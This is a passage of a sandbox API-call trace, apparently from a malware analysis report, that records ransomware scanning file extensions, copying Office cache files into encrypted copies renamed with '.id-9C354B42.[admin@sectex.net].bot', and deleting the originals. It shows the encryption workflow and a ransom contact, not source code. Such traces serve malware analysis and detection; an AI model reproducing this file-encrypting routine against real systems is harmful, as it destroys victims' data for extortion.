	[0044.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.992] lstrlenW (lpString=".zip") returned 4
	[0044.992] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1
	[0044.992] lstrlenW (lpString=".rar") returned 4
	[0044.992] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1
	[0044.992] lstrlenW (lpString=".bz2") returned 4
	[0044.992] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1
	[0044.992] lstrlenW (lpString=".7z") returned 3
	[0044.992] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1
	[0044.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.992] lstrlenW (lpString=".dbf") returned 4
	[0044.992] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1
	[0044.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.992] lstrlenW (lpString=".1cd") returned 4
	[0044.992] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1
	[0044.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.992] lstrlenW (lpString=".jpg") returned 4
	[0044.992] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1
	[0044.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.992] lstrlenW (lpString=".doc") returned 4
	[0044.992] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1
	[0044.992] lstrlenW (lpString=".docx") returned 5
	[0044.992] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1
	[0044.992] lstrlenW (lpString=".pdf") returned 4
	[0044.992] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1
	[0044.992] lstrlenW (lpString=".xls") returned 4
	[0044.992] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1
	[0044.993] lstrlenW (lpString=".xlsx") returned 5
	[0044.993] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1
	[0044.993] lstrlenW (lpString=".ppt") returned 4
	[0044.993] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1
	[0044.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.993] lstrlenW (lpString=".zip") returned 4
	[0044.993] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1
	[0044.993] lstrlenW (lpString=".rar") returned 4
	[0044.993] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1
	[0044.993] lstrlenW (lpString=".bz2") returned 4
	[0044.993] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1
	[0044.993] lstrlenW (lpString=".7z") returned 3
	[0044.993] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1
	[0044.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.993] lstrlenW (lpString=".dbf") returned 4
	[0044.993] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1
	[0044.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.993] lstrlenW (lpString=".1cd") returned 4
	[0044.993] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1
	[0044.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.993] lstrlenW (lpString=".jpg") returned 4
	[0044.993] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1
	[0044.993] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0044.993] lstrlenW (lpString="msvcr90.dll") returned 11
	[0044.993] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0044.994] GetFileSizeEx (in: hFile=0x200, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=655872) returned 1
	[0044.994] CloseHandle (hObject=0x200) returned 1
	[0044.994] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 0x2020
	[0044.994] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.994] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0044.994] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.994] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.994] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0044.994] GetLastError () returned 0x0
	[0044.995] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0xa0200, lpOverlapped=0x0) returned 1
	[0045.009] WriteFile (in: hFile=0x1f0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xa0210, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xa0210, lpOverlapped=0x0) returned 1
	[0045.346] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.346] WriteFile (in: hFile=0x1f0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0045.346] SetEndOfFile (hFile=0x1f0) returned 1
	[0045.346] CloseHandle (hObject=0x1f0) returned 1
	[0045.346] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.346] SetEndOfFile (hFile=0x200) returned 1
	[0045.352] CloseHandle (hObject=0x200) returned 1
	[0045.352] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0045.352] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 1
	[0045.352] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.352] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.352] lstrlenW (lpString=".doc") returned 4
	[0045.352] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0045.352] lstrlenW (lpString=".docx") returned 5
	[0045.352] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1
	[0045.352] lstrlenW (lpString=".pdf") returned 4
	[0045.353] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0045.353] lstrlenW (lpString=".xls") returned 4
	[0045.353] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0045.353] lstrlenW (lpString=".xlsx") returned 5
	[0045.353] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1
	[0045.353] lstrlenW (lpString=".ppt") returned 4
	[0045.353] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0045.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.353] lstrlenW (lpString=".zip") returned 4
	[0045.353] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0045.353] lstrlenW (lpString=".rar") returned 4
	[0045.353] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0045.353] lstrlenW (lpString=".bz2") returned 4
	[0045.353] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0045.353] lstrlenW (lpString=".7z") returned 3
	[0045.353] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0045.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.353] lstrlenW (lpString=".dbf") returned 4
	[0045.353] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0045.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.353] lstrlenW (lpString=".1cd") returned 4
	[0045.353] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0045.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.353] lstrlenW (lpString=".jpg") returned 4
	[0045.353] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0045.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.353] lstrlenW (lpString=".doc") returned 4
	[0045.353] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0045.353] lstrlenW (lpString=".docx") returned 5
	[0045.353] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1
	[0045.353] lstrlenW (lpString=".pdf") returned 4
	[0045.353] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0045.353] lstrlenW (lpString=".xls") returned 4
	[0045.354] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0045.354] lstrlenW (lpString=".xlsx") returned 5
	[0045.354] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1
	[0045.354] lstrlenW (lpString=".ppt") returned 4
	[0045.354] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0045.354] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.354] lstrlenW (lpString=".zip") returned 4
	[0045.354] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0045.354] lstrlenW (lpString=".rar") returned 4
	[0045.354] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0045.354] lstrlenW (lpString=".bz2") returned 4
	[0045.354] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0045.354] lstrlenW (lpString=".7z") returned 3
	[0045.354] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0045.354] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.354] lstrlenW (lpString=".dbf") returned 4
	[0045.354] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0045.354] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.354] lstrlenW (lpString=".1cd") returned 4
	[0045.354] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0045.354] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74
	[0045.354] lstrlenW (lpString=".jpg") returned 4
	[0045.354] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0045.354] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0045.354] lstrlenW (lpString="OfficeMUISet.msi") returned 16
	[0045.354] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0045.355] GetFileSizeEx (in: hFile=0x200, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=868864) returned 1
	[0045.355] CloseHandle (hObject=0x200) returned 1
	[0045.355] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 0x2020
	[0045.355] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.355] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0045.355] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.355] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.355] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0045.355] GetLastError () returned 0x0
	[0045.355] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0xd4200, lpOverlapped=0x0) returned 1
	[0045.372] WriteFile (in: hFile=0x1f0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xd4210, lpOverlapped=0x0) returned 1
	[0045.386] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.386] WriteFile (in: hFile=0x1f0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0045.386] SetEndOfFile (hFile=0x1f0) returned 1
	[0045.386] CloseHandle (hObject=0x1f0) returned 1
	[0045.386] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.386] SetEndOfFile (hFile=0x200) returned 1
	[0045.659] CloseHandle (hObject=0x200) returned 1
	[0045.659] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0045.660] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 1
	[0045.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.660] lstrlenW (lpString=".doc") returned 4
	[0045.660] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0045.660] lstrlenW (lpString=".docx") returned 5
	[0045.660] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1
	[0045.660] lstrlenW (lpString=".pdf") returned 4
	[0045.660] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0045.660] lstrlenW (lpString=".xls") returned 4
	[0045.660] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0045.660] lstrlenW (lpString=".xlsx") returned 5
	[0045.660] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1
	[0045.660] lstrlenW (lpString=".ppt") returned 4
	[0045.660] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0045.660] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.660] lstrlenW (lpString=".zip") returned 4
	[0045.660] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0045.660] lstrlenW (lpString=".rar") returned 4
	[0045.660] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0045.661] lstrlenW (lpString=".bz2") returned 4
	[0045.661] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0045.661] lstrlenW (lpString=".7z") returned 3
	[0045.661] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0045.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.661] lstrlenW (lpString=".dbf") returned 4
	[0045.661] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0045.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.661] lstrlenW (lpString=".1cd") returned 4
	[0045.661] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0045.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.661] lstrlenW (lpString=".jpg") returned 4
	[0045.661] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0045.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.661] lstrlenW (lpString=".doc") returned 4
	[0045.661] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0045.661] lstrlenW (lpString=".docx") returned 5
	[0045.661] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1
	[0045.661] lstrlenW (lpString=".pdf") returned 4
	[0045.661] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0045.661] lstrlenW (lpString=".xls") returned 4
	[0045.661] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0045.661] lstrlenW (lpString=".xlsx") returned 5
	[0045.661] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1
	[0045.661] lstrlenW (lpString=".ppt") returned 4
	[0045.661] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0045.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.661] lstrlenW (lpString=".zip") returned 4
	[0045.661] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0045.661] lstrlenW (lpString=".rar") returned 4
	[0045.661] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0045.661] lstrlenW (lpString=".bz2") returned 4
	[0045.662] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0045.662] lstrlenW (lpString=".7z") returned 3
	[0045.662] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0045.662] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.662] lstrlenW (lpString=".dbf") returned 4
	[0045.662] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0045.662] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.662] lstrlenW (lpString=".1cd") returned 4
	[0045.662] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0045.662] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79
	[0045.662] lstrlenW (lpString=".jpg") returned 4
	[0045.662] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0045.662] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0045.662] lstrlenW (lpString="AccessMUISet.msi") returned 16
	[0045.662] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0045.662] GetFileSizeEx (in: hFile=0x200, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=868864) returned 1
	[0045.662] CloseHandle (hObject=0x200) returned 1
	[0045.663] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 0x2020
	[0045.663] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.663] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0045.663] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.663] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.663] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0045.663] GetLastError () returned 0x0
	[0045.663] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0xd4200, lpOverlapped=0x0) returned 1
	[0045.680] WriteFile (in: hFile=0x1d0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xd4210, lpOverlapped=0x0) returned 1
	[0045.698] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.698] WriteFile (in: hFile=0x1d0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0045.698] SetEndOfFile (hFile=0x1d0) returned 1
	[0045.698] CloseHandle (hObject=0x1d0) returned 1
	[0045.699] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.699] SetEndOfFile (hFile=0x200) returned 1
	[0046.251] CloseHandle (hObject=0x200) returned 1
	[0046.251] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
